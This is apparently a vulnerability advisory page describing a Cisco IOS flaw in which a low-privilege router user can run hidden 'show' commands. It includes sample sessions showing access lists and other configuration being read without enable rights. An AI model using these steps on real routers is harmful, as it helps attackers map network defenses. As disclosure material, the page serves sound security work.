• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Cisco Router Online Help Vulnerability

As taken from the original post on this vulnerability (See the Credit Section):


Routers tested: 2500, 2600, 3600, 4000, 7200, 7500 series,
running IOS 9.14, 11.1(21) (Distributed Director), 11.2(x)
and 12.0(x). Some were tested on the local console, some
over Telnet. We recently tested PIX 4.x, and found it was
NOT vulnerable.

A regular user will log-on with privilege level equal to 1.
This can be shown by running "show privilege" after logging
on the router. For example:

User Access Verification

Username: joeuser
Password: <password>
Router2>sh priv
Current privilege level is 1
Router2>

Now, if we try to get a list of all possible "show"
commands, by doing "show ?", we get:

Router2>show privilege
Current privilege level is 1
Router2>show ?
backup Backup status
cef Cisco Express Forwarding
clock Display the system clock
dialer Dialer parameters and statistics
flash: display information about flash: file
system
history Display the session command history
...

Notice that we did not see an "access-lists" option, so the
help system thinks we should not be able to run it...


However,

Router2>show privilege
Current privilege level is 1
Router2>show access-lists
Standard IP access list 10
permit 172.16.0.1
deny any
Extended IP access list eth0-IN
permit udp host 172.16.0.1 10.11.12.0 0.0.0.255 eq
snmp (14982 matches)
permit udp host 172.16.0.1 10.11.13.128 0.0.0.127 eq
snmp (4026 matches)

So, we can see the configuration, even though we shouldn't.
We can't alter it, but even seeing the access-list is
beneficial to an attacker.

Upon further testing on a 3640 running IOS 12.0(5), we got
the following results:

- We found 75 "show" commands that are supposed to be
available only in enable mode. Meaning: the difference
between "show ?" in enabled and disabled mode was this 75
commands

- Out of 75, only 13 were truly restricted. The other 62
were available to be viewed by a session in a disabled mode.

- Out of the 62 that were viewable, we counted 7 as being
potentially very dangerous. "show ip" is one of them, as
well as "show cdp", "show logging", "show cdp", "show
vlans". There are others, but I don't have my list with me
right now.

- By combining "show ip" and "show access-lists" we had a
very clear picture of how access-lists were distributed in
the router.